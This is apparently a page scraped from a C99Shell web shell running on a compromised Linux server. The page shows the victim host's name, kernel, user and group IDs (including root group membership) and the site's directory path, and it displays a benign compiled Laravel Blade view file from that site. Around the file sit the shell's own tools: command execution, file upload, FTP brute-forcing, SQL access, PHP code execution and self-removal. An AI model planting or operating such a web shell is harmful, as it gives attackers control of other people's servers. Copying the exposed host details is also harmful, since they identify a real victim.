!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.29 GB of 117.98 GB (23.98%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     cad947a84f935abc039472286aca31d1.php (2.95 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$singuler 
Str::plural($word1);
$plural Str::plural($word2);
$method Str::upper($method);
?>
<?php 
if($method == 'GET'): ?>
    <div class="empty py-5">
        <div class="empty-img">
            <img src="<?php echo e(asset('backend/image')); ?>/not-found.svg" height="128" alt="">
        </div>
        <h5 class="mt-4"><?php echo e(__('no_results_found')); ?></h5>
        <p class="empty-subtitle text-muted">
            <?php echo e(__('there_is_no')); ?> <?php echo e(__(strtolower($plural))); ?> <?php echo e(__('found_in_this_page')); ?>

        </p>
        <div class="empty-action">
            <?php if($route !== ''): ?>
                <a href="<?php echo e(route($route)); ?>" class="btn btn-primary">
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon" width="24" height="24"
                        viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round"
                        stroke-linejoin="round">
                        <path stroke="none" d="M0 0h24v24H0z" fill="none"></path>
                        <line x1="12" y1="5" x2="12" y2="19"></line>
                        <line x1="5" y1="12" x2="19" y2="12"></line>
                    </svg>
                    <?php echo e(__('add_your_first')); ?> <?php echo e(strtolower($singuler)); ?>

                </a>
            <?php endif; ?>
        </div>
    </div>
<?php else: ?>
    <div class="empty py-5">
        <div class="empty-img">
            <img src="<?php echo e(asset('backend/image')); ?>/not-found.svg" height="128" alt="">
        </div>
        <h5 class="mt-4"><?php echo e(__('no_results_found')); ?></h5>
        <p class="empty-subtitle text-muted">
            <?php echo e(__('there_is_no')); ?> <?php echo e(strtolower($plural)); ?> <?php echo e(__('found_in_this_page')); ?>

        </p>
        <div class="empty-action">
            <?php if($route !== ''): ?>
                <form action="<?php echo e(route($route)); ?>" method="POST">
                    <?php echo csrf_field(); ?>
                    <button class="btn btn-primary" type="submit">
                        <svg xmlns="http://www.w3.org/2000/svg" class="icon" width="24" height="24"
                            viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none"
                            stroke-linecap="round" stroke-linejoin="round">
                            <path stroke="none" d="M0 0h24v24H0z" fill="none"></path>
                            <line x1="12" y1="5" x2="12" y2="19"></line>
                            <line x1="5" y1="12" x2="19" y2="12"></line>
                        </svg>
                        <?php echo e(__('add_your_first')); ?> <?php echo e(strtolower($singuler)); ?>

                    </button>
                </form>
            <?php endif; ?>
        </div>
    </div>
<?php endif; ?>
<?php 
/**PATH E:\add listing 8-9-25\addListing\resources\views/components/admin/not-found.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0036 ]--